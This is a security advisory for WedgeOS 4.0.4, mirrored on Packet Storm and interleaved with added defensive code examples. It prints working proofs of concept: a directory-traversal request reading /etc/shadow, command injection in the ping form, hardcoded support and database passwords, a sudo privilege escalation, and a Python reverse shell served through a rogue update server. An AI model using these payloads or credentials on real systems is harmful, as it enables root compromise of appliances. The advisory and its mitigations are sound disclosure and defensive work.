WedgeOS 4.0.4 Arbitrary File Read / Command Execution

2015-06-30T00:00:00
ID PACKETSTORM:132497
Type packetstorm
Reporter Daniel Jensen
Modified 2015-06-30T00:00:00

Description

                                        
( , ) (,  
. '.' ) ('. ',  
). , ('. ( ) (  
(_,) .'), ) _ _,  
/ _____/ / _ \ ____ ____ _____  
\____ \==/ /_\ \ _/ ___\/ _ \ / \  
/ \/ | \\ \__( <_> ) Y Y \  
/______ /\___|__ / \___ >____/|__|_| /  
\/ \/.-. \/ \/:wq  
(x.0)  
'=.|w|.='  
_=''"''=.  
  
presents..  
  
WedgeOS Multiple Vulnerabilities  
Affected versions: WedgeOS <= 4.0.4  
  
PDF:  
http://www.security-assessment.com/files/documents/advisory/WedgeOS-Final.pdf  
  
+-----------+  
|Description|  
+-----------+  
Wedge Networks WedgeOS Virtual Appliance contains a number of security  
vulnerabilities, including unauthenticated arbitrary file read as root,  
command injection in the web interface, privilege escalation to root,  
and command execution via the system update functionality.  
  
+------------+  
|Exploitation|  
+------------+  
==Unauthenticated Arbitrary File Read==  
Any user with access to the web interface of WedgeOS may submit a GET  
request to the ssgimages function, using directory traversal to specify  
an arbitrary file on disk. The web server runs as root, so any file may  
be read, including the shadow file. This vulnerability can be used to  
read the contents of the local MySQL database, which contains MD5  
password hashes for the web interface.  
[POC]  
curl -sk 'https://[HOST]/ssgmanager/ssgimages?name=../../../../../etc/shadow' | head -n 1  
root:$1$KVY2OJDj$Xg5LkGQI3lUvzr8GVIErp/:15828:0:99999:7:::  
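The root cause here is a `name` parameter joined onto a directory without confining the result, served by a process running as root. The following is an added example, not code from the advisory or from Wedge Networks: a path-confinement check of the kind the `ssgimages` handler needs, and a detector that flags traversal attempts in web access logs. The image root directory, the access-log format and the log lines are assumptions constructed for the demonstration.

```python
import os
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Directory the image handler is meant to serve from (assumed name).
IMAGE_ROOT = "/srv/ssgimages"


def safe_join(base: str, name: str):
    """Return the absolute path of `name` inside `base`, or None when the
    request would escape the directory (traversal, absolute path, NUL byte).
    Purely lexical: once the file exists, os.path.realpath() should also be
    checked so symlinks cannot point back out of the tree."""
    if not name or "\x00" in name:
        return None
    # An absolute name would make os.path.join discard `base` entirely.
    if os.path.isabs(name):
        return None
    base_abs = os.path.normpath(os.path.abspath(base))
    candidate = os.path.normpath(os.path.join(base_abs, name))
    # Accept only the base itself or something strictly below it.
    if candidate != base_abs and not candidate.startswith(base_abs + os.sep):
        return None
    return candidate


# A ".." path segment anywhere in the decoded parameter.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def flag_traversal_requests(log_lines):
    """Return (line_number, decoded_name) for access-log lines whose
    ssgimages `name` parameter contains a '..' segment after URL decoding."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        if not parts.path.endswith("/ssgimages"):
            continue
        for raw in parse_qs(parts.query, keep_blank_values=True).get("name", []):
            # parse_qs decoded once; decoding again catches %252e-style
            # double encoding that a lax server might decode itself.
            decoded = unquote(raw)
            if TRAVERSAL.search(decoded):
                hits.append((lineno, decoded))
    return hits


# Constructed access-log lines (common log format) for the demonstration.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jun/2015:11:50:09 +1200] "GET /ssgmanager/ssgimages?name=logo.png HTTP/1.1" 200 812',
    '10.0.0.9 - - [18/Jun/2015:11:51:30 +1200] "GET /ssgmanager/ssgimages?name=../../../../../etc/shadow HTTP/1.1" 200 1209',
    '10.0.0.9 - - [18/Jun/2015:11:52:02 +1200] "GET /ssgmanager/ssgimages?name=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2041',
    '10.0.0.5 - - [18/Jun/2015:11:53:15 +1200] "POST /ssgmanager/jsp/readaccess/ping.jsf HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for req in ("logo.png", "sub/../logo.png", "../../../../../etc/shadow"):
        print(f"{req!r:40} -> {safe_join(IMAGE_ROOT, req)}")
    for lineno, name in flag_traversal_requests(SAMPLE_LOG):
        print(f"log line {lineno}: traversal attempt for {name!r}")
```

The detector keys on the decoded parameter rather than on the raw string, so percent-encoded forms such as `..%2F` are caught; a 200 status on such a request, as in the second and third sample lines, is the signal that the server actually served the file. Serving static images from a process with root privileges is the second defect, independent of the path check.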
  
==Command Injection==  
Any authenticated user may execute arbitrary commands as root. The ping,  
nslookup, and traceroute functions of the diagnostic interface fail to  
validate user input correctly, which allows the injection of arbitrary  
system commands. Bash brace expansion can be used to execute more  
syntactically complex commands.  
[POC]  
----  
POST /ssgmanager/jsp/readaccess/ping.jsf HTTP/1.1  
Host: [HOST]  
Cookie: JSESSIONID=[SESSION];  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 123  
  
mainform=mainform&mainform:input=1%26id&mainform:submitGo=Go&mainform:j_id_jsp_208968386_10pc4=&javax.faces.ViewState=j_id3  
----  
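The diagnostic functions pass the submitted host straight into a shell command line, which is why `1%26id` (`1&id`) runs `id` as root. As an added example that is not the advisory's or the vendor's code, the following shows the unsafe string-building pattern beside a hardened version: the target is validated as an IP literal or an RFC 1123 hostname, then passed to the program as an argv element with no shell involved, so metacharacters and brace expansion never reach an interpreter. The ping arguments are assumptions for the demonstration.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, at most 253 characters overall.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def vulnerable_ping_command(target: str) -> str:
    """The pattern the advisory describes: user input concatenated into a
    string that is later handed to a shell. '1&id' yields 'ping -c 4 1&id',
    which the shell runs as two commands. Shown for contrast only."""
    return f"ping -c 4 {target}"


def validate_target(target: str) -> str:
    """Accept an IPv4/IPv6 literal or a syntactically valid hostname;
    raise ValueError for anything else (shell metacharacters, spaces,
    leading hyphens that could be read as options, over-long input)."""
    target = target.strip()
    if not target or len(target) > 253:
        raise ValueError("empty or over-long target")
    try:
        return str(ipaddress.ip_address(target))  # normalised literal
    except ValueError:
        pass
    if not HOSTNAME_RE.match(target):
        raise ValueError(f"not a hostname or IP literal: {target!r}")
    return target


def build_ping_command(target: str) -> list:
    """Build an argv list for subprocess; no shell is ever involved, so the
    only thing the user controls is the value of one argument."""
    host = validate_target(target)
    return ["ping", "-c", "4", host]


def run_ping(target: str, timeout: int = 15) -> str:
    """Execute the validated command (list form, shell=False by default)."""
    proc = subprocess.run(build_ping_command(target), capture_output=True,
                          text=True, timeout=timeout)
    return proc.stdout


if __name__ == "__main__":
    print("unsafe string:", vulnerable_ping_command("1&id"))
    for candidate in ("8.8.8.8", "example.com", "1&id", "x{a,b}", "-f"):
        try:
            print(candidate, "->", build_ping_command(candidate))
        except ValueError as exc:
            print(candidate, "-> rejected:", exc)
```

The same validate-then-argv pattern applies to the nslookup and traceroute functions the advisory names. Note that the validation is what blocks the `-f`-style option injection, not the argv form on its own: a value beginning with a hyphen is still read as a flag by the target program if it is allowed through.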
  
==Privilege Escalation==  
A remote user with access to the 'support' account over SSH can escalate  
privileges to root by way of the admin account. The support  
account can be accessed with the password "ous35hi3". This gives the  
user a bash shell. If the support user knows the password for the admin  
user, they can switch to the admin user and launch a bash shell.  
Otherwise, the admin password can be reset by logging in with the  
resetpassword user, or by accessing the local MySQL database and  
cracking the admin hash. The database can be accessed with the "root"  
user and password "wecandoit".  
  
Once the user has the admin password, they can switch to the admin user  
and spawn a bash shell by executing the following command:  
su -s /bin/bash admin  
  
With a bash shell as the admin user, there are multiple methods to  
escalate to root. If the file /var/tmp/secfi_update.sh does not exist,  
the admin user can create it and execute it as root with sudo. However,  
this file is created when the system is updated, so it may already exist  
and this method may not be available.  
The admin user can also escalate privileges to root by creating a  
specific directory path in any location where they have write access,  
and exploiting environment variables when running the ctl_snort.sh  
script via sudo.  
  
[POC]  
-Read admin password from DB-  
ssh support@[HOST]  
support@[HOST]'s password: [ous35hi3]  
[support@wedgevm ~]$ mysql -u root --password=wecandoit ssgmanager -e 'select password from admin;'  
+----------------------------------+  
| password |  
+----------------------------------+  
| [PASSWORD] |  
+----------------------------------+  
  
-Reset admin password with support user-  
ssh resetpassword@[HOST]  
resetpassword@[HOST]'s password: [default!]  
Reset password for admin (y/n)? y  
Resetting admin password...  
Admin password has been reset to default.  
Connection to [HOST] closed.  
  
-Privesc via environment variables and sudo-  
[support@wedgevm ~]$ su -s /bin/bash admin  
Password: [admin] (Default password)  
[admin@wedgevm support]$ export GUARDIAN_HOME=/var/tmp  
[admin@wedgevm support]$ mkdir -p /var/tmp/shared/script  
[admin@wedgevm support]$ echo "id > /var/tmp/id" > /var/tmp/shared/script/query_license.sh  
[admin@wedgevm support]$ chmod +x /var/tmp/shared/script/query_license.sh  
[admin@wedgevm support]$ sudo /usr/local/snort/bin/ctl_snort.sh start -mode ids  
Error: specify the snort configuration file with -config  
[admin@wedgevm support]$ cat /var/tmp/id  
uid=0(root) gid=0(root)  
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)  
[admin@wedgevm support]$  
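Both sudo escalations come down to configuration that a defender can audit: a root-run script that honours a caller-controlled environment variable (GUARDIAN_HOME) because sudo lets it through, and a sudo rule naming a script under a directory the caller can write (/var/tmp/secfi_update.sh). The following is an added example, not the advisory's or the vendor's code: a small audit over sudoers text that flags `!env_reset`, `env_keep` pass-through of non-standard variables, `SETENV` tags, and commands located under caller-writable directories. The sudoers fragment is constructed for the demonstration and is not WedgeOS's actual configuration.

```python
import re

# Constructed sudoers fragment that exercises the audit; it is not the
# real WedgeOS configuration.
SAMPLE_SUDOERS = """\
Defaults    env_reset
Defaults    env_keep += "GUARDIAN_HOME SNORT_HOME"
admin   ALL=(root) NOPASSWD: /usr/local/snort/bin/ctl_snort.sh
admin   ALL=(root) NOPASSWD: /var/tmp/secfi_update.sh
admin   ALL=(root) SETENV: /usr/local/bin/reload_policy.sh
"""

# Variables conventionally safe to keep across sudo (locale, terminal).
BENIGN_KEEP = {"COLORS", "DISPLAY", "HOSTNAME", "HISTSIZE", "LANG",
               "LC_ALL", "MAIL", "PS1", "PS2", "TERM", "XAUTHORITY"}
# Directories an unprivileged caller can typically create files in.
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

# <user> <host>=(<runas>) [TAG: ...] <command list>
_RULE = re.compile(r"^(\S+)\s+\S+=(?:\(\S+\))?\s*(.*)$")
_TAG = re.compile(r"^([A-Z]+):\s*")


def audit_sudoers(text: str):
    """Return a list of (line_number, message) findings."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("Defaults"):
            body = line[len("Defaults"):].strip()
            if re.search(r"(^|,)\s*!env_reset\b", body):
                findings.append((lineno, "env_reset disabled: the caller's "
                                 "environment reaches every sudo command"))
            m = re.search(r'env_keep\s*\+?=\s*"?([^"]*)', body)
            if m:
                for var in m.group(1).split():
                    if var not in BENIGN_KEEP:
                        findings.append((lineno, f"env_keep passes {var} "
                                         "through to the root-run command"))
            continue
        m = _RULE.match(line)
        if not m:
            continue
        user, rest = m.group(1), m.group(2)
        tags = []
        while True:  # strip leading TAG: markers such as NOPASSWD: / SETENV:
            t = _TAG.match(rest)
            if not t:
                break
            tags.append(t.group(1))
            rest = rest[t.end():]
        for cmd in rest.split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            path = cmd.split()[0]
            if "SETENV" in tags:
                findings.append((lineno, f"SETENV lets {user} set arbitrary "
                                 f"variables when running {path}"))
            if path.startswith(UNTRUSTED_PREFIXES):
                findings.append((lineno, f"{path} is under a caller-writable "
                                 f"directory; {user} can supply its contents"))
    return findings


if __name__ == "__main__":
    for lineno, msg in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {lineno}: {msg}")
```

A static sudoers audit cannot see that ctl_snort.sh itself builds a script path from `$GUARDIAN_HOME` (the third sample rule produces no finding), so the script-side fix is separate: a root-run script should hard-code its installation directory rather than read it from the environment, and sudo should keep the default `env_reset` without adding such variables to `env_keep`.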
  
  
==Command Execution==  
An admin user with write access to the web interface may execute  
arbitrary commands as root. The user can specify an external server from  
which to retrieve system updates. WedgeOS requests a shell script from  
the remote host and runs it as root. No validation of the script is  
performed, so arbitrary commands may be specified.  
  
[POC]  
-Reverse Shell-  
$cat secfi_update1.2.3.4.sh  
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[HOST]",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'  
  
-HTTP Post-  
POST /ssgmanager/jsp/writeaccess/SystemUpdate.jsf HTTP/1.1  
Host: [HOST]  
Cookie: JSESSIONID=[SESSION]; JSESSIONIDSSO=[SESSION]  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 233  
  
mainform=mainform&mainform%3Aid=1&mainform%3Apassword=1&mainform%3Aupdates=&mainform%3Aversion=1.2.3.4&mainform%3AisDefaultServer=false&mainform%3AcustomServer=[HOST]%2F&mainform%3Asave=Run+Update&javax.faces.ViewState=j_id12  
  
-HTTP Server and Listener-  
$python -m SimpleHTTPServer 80 & netcat -vnlp 1337  
[1] 24289  
listening on [any] 1337 ...  
Serving HTTP on 0.0.0.0 port 80 ...  
[HOST] - - [18/Jun/2015 11:50:09] "GET /secfi_update1.2.3.4.sh HTTP/1.0" 200 -  
connect to [HOST] from (UNKNOWN) [HOST] 53933  
sh: no job control in this shell  
sh-4.0# id  
id  
uid=0(root) gid=0(root)  
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)  
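The update path fails on two counts: the appliance fetches over plain HTTP from any host the `customServer` parameter names, and it executes whatever comes back without checking its origin. The following is an added example, not the advisory's or the vendor's code, of the gate an updater needs before running a fetched script: an HTTPS-only allow-list on the update URL, and a signature check over the script bytes. HMAC-SHA256 with a demonstration key stands in for the vendor's signature only because it is in the standard library; a production updater verifies an asymmetric signature with a public key baked into the appliance so the device never holds signing capability. The host name, key and script contents are constructed for the demonstration.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Assumed allow-list; a real deployment pins the vendor's update hostname
# and relies on TLS certificate validation for the transport.
ALLOWED_UPDATE_HOSTS = {"updates.example.invalid"}

# Constructed demonstration key and script; stand-ins for the vendor's
# signing key and a real update package.
DEMO_KEY = b"constructed-demo-key-not-a-real-secret"
DEMO_SCRIPT = b"#!/bin/sh\n# constructed sample update\nyum -y update wedge-core\n"


def check_update_url(url: str) -> str:
    """Reject anything that is not https to an allow-listed host."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ValueError(f"update URL must use https, got {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials embedded in the update URL are not allowed")
    if parts.hostname not in ALLOWED_UPDATE_HOSTS:
        raise ValueError(f"update host {parts.hostname!r} is not on the allow-list")
    return url


def sign_script(script: bytes, key: bytes) -> str:
    """Vendor side: produce the signature that ships beside the script.
    (HMAC stand-in for an asymmetric signature; see lead-in.)"""
    return hmac.new(key, script, hashlib.sha256).hexdigest()


def verify_script(script: bytes, signature_hex: str, key: bytes) -> bool:
    """Appliance side: constant-time comparison against the expected tag."""
    expected = sign_script(script, key)
    return hmac.compare_digest(expected, signature_hex)


def accept_update(url: str, script: bytes, signature_hex: str, key: bytes) -> bytes:
    """Every check must pass before the fetched bytes may be executed."""
    check_update_url(url)
    if not verify_script(script, signature_hex, key):
        raise ValueError("signature mismatch: refusing to execute update script")
    return script


if __name__ == "__main__":
    sig = sign_script(DEMO_SCRIPT, DEMO_KEY)
    good = "https://updates.example.invalid/secfi_update4.0.5.sh"
    print("accepted:", accept_update(good, DEMO_SCRIPT, sig, DEMO_KEY) is DEMO_SCRIPT)
    for url, body in (("http://updates.example.invalid/x.sh", DEMO_SCRIPT),
                      ("https://203.0.113.9/secfi_update1.2.3.4.sh", DEMO_SCRIPT),
                      (good, DEMO_SCRIPT + b"id > /tmp/x\n")):
        try:
            accept_update(url, body, sig, DEMO_KEY)
        except ValueError as exc:
            print("rejected:", exc)
```

With a signature check in place the `customServer` field stops being a code-execution primitive: a script from an arbitrary host fails verification regardless of where it was fetched from. The allow-list is the second layer, so that a mistakenly exposed signing key still cannot be exercised through an attacker-chosen server. A change to the update server setting is also worth logging and alerting on, since in the advisory's scenario it is the only visible action before the root shell.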
  
+----------+  
| Solution |  
+----------+  
Update to WedgeOS version 4.0.5-482 or greater.  
  
+-------------------+  
|Disclosure Timeline|  
+-------------------+  
16/03/2015 - Advisory sent to vendor.  
20/03/2015 - Follow up email checking if vendor has received.  
24/03/2015 - Advisory receipt acknowledged by vendor.  
22/04/2015 - Email sent asking for update, email undeliverable due to  
421 Timeout from vendor mail server.  
28/04/2015 - Additional email sent asking for update.  
28/04/2015 - Vendor response, states official response will be provided  
shortly.  
15/05/2015 - Email sent asking for update on official response, email  
undeliverable.  
20/05/2015 - Additional email sent asking for update on official  
response, email undeliverable.  
27/05/2015 - Called vendor, who stated a new release is being worked on  
and an update will be provided soon.  
03/06/2015 - Email from vendor stating a new version is being put together.  
09/06/2015 - Email sent to vendor stating the advisory will be publicly  
disclosed soon, email undeliverable.  
12/06/2015 - Called vendor, who stated a new version will be released  
shortly.  
12/06/2015 - Email from vendor confirming imminent release of new version.  
12/06/2015 - Vendor advises a fix is in place in the newly released  
update of WedgeOS.  
29/06/2015 - Advisory Release.  
  
+-----------------------------+  
|About Security-Assessment.com|  
+-----------------------------+  
  
Security-Assessment.com is Australasia's leading team of Information  
Security consultants specialising in providing high quality Information  
Security services to clients throughout the Asia Pacific region. Our  
clients include some of the largest globally recognised companies in  
areas such as finance, telecommunications, broadcasting, legal and  
government. Our aim is to provide the very best independent advice and a  
high level of technical expertise while creating long and lasting  
professional relationships with our clients.  
  
Security-Assessment.com is committed to security research and  
development, and its team continues to identify and responsibly publish  
vulnerabilities in public and private software vendor's products.  
Members of the Security-Assessment.com R&D team are globally recognised  
through their release of whitepapers and presentations related to new  
security research.  
  
For further information on this issue or any of our service offerings,  
contact us:  
Web www.security-assessment.com  
Email info () security-assessment.com  
Phone +64 4 470 1650  
  
  
  